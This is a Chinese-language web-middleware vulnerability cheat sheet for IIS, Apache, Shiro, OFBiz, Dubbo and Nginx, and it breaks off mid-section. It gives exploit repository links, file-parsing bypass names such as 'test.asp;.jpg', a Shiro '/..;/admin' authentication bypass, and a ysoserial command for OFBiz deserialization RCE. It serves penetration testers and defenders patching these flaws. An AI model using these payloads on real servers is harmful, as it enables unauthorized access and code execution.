1. IIS
1. PUT漏洞
用户配置不当,exp:https://github.com/hackping/HTTPMLScan.git
2. 短文件名猜解
IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。
exp:https://github.com/WebBreacher/tilde_enum
3.远程代码执行(CVE-2017-7269))
**exp**:https://github.com/zcgonvh/cve-2017-7269
4. 解析漏洞
iis6.0畸形解析:asa、cer
iis6.0目录解析:/test.asp/test.jpg
iis6.0文件解析:test.asp;.jpg
IIS7.5文件解析:test.jpg/.php
2. Apache
- 解析漏洞
用户配置不当,如1.php.biubiu
会被当成php文件执行 - 目录遍历
用户配置不当,扫描到目录直接访问即可 - 未授权访问漏洞
- shiro未授权访问漏洞(CVE-2020-1957)
影响版本
shiro 1.5.2版本以下
poc:构造/目标/..;/admin
即可进入后台` - shiro未授权访问漏洞(CVE-2020-1957)
- rce
- Apache Ofbiz XMLRPC RCE(CVE-2020-9496)
影响版本
Apache Ofbiz:< 17.12.04
poc步骤
step1:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "你的指令" | base64 | tr -d '\n'
step:放入下面xml 中<?xml version="1.0"?> <methodCall> <methodName>ping</methodName> <params> <param> <value>test</value> </param> </params> </methodCall>
- 反序列化
- Dubbo 2.7.6 反序列化漏洞(CVE-2020-1948)
影响版本
Dubbo 2.7.0 to 2.7.6
Dubbo 2.6.0 to 2.6.7
Dubbo all 2.5.x versions (not supported by official team any longer)
exp:https://github.com/ctlyz123/CVE-2020-1948.git
3. Nginx
1. 文件解析
用户配置不当,对于任意文件名,在后面加上/任意文件名.php后该文件就会以php格式进行解析,如`1.png/.php`
2. 目录遍历
用户配置不当,扫描到目录直接访问即可
3. CRLF注入
CRLF是”回车 + 换行”(\r\n)的简称,其十六进制编码分别为0x0d和0x0a。在HTTP协议中,HTTP Header与HTTP
Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTTP
消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP
Response Splitting,简称HRS。
- 会话固定漏洞
构造如下